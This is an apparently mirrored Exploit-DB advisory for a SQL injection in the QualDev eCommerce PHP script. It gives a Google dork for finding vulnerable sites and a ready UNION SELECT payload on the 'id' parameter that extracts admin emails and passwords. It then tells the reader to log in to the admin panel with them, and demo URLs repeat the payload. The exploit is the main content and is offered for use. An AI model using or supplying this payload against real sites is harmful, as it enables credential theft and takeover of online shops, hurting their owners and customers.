QualDev eCommerce script – SQL Injection - 体验盒子

作者： ErrNick

日期： 2010-12-16

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/15748/

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

====================================================

QualDev eCommerce script SQL injection vulnerability

====================================================

# Exploit Title: QualDev eCommerce script SQL injection vulnerability

# Vendor: http://www.qualdev.com

# Date: 15.12.2010

# Version: all version

# Category:: webapps

# Google dork: inurl:"index.php?file=allfile"

# Tested on: FreeBSD 7.1

# Author: ErrNick

# Site: XakNet.ru, forum.xaknet.ru

# Contact: errnick[at]xaknet[dot]ru

# Greatz 2 all memberz of XakNet team ( X1mk0~, Saint, baltazar, SHYLLER,

Kronus, mst && others)

# Intro:

- A parameter is not properly sanitised beforebeing used in a SQL query.

- Inputpassed to "id"parameterisnotproperly

- sanitised before being used in a SQL query.Thiscan be

- exploitedtomanipulateSQL queries by injecting

- arbitrary SQL code.

# Exploit:

index.php?file=allfile&id=-9999+union+select+1,2,3,concat_ws(0x3a,vemail,vpassword),5,6,7+from+admin

logining with admin email && password there

http://victim/adminpanel/

#Demo:

-

http://www.site.com/index.php?file=allfile&id=-40+union+select+1,2,3,concat_ws(0x3a,vemail,vpassword),5,6,7+from+admin

-

http://www.site.com/index.php?file=allfile&id=-9999+union+select+1,2,3,concat_ws(0x3a,vemail,vpassword),5,6,7+from+admin

-

http://www.site.com/index.php?file=allfile&id=-9999+union+select+1,2,3,concat_ws(0x3a,vemail,vpassword),5,6,7+from+admin

Vizit us at http://xaknet.ru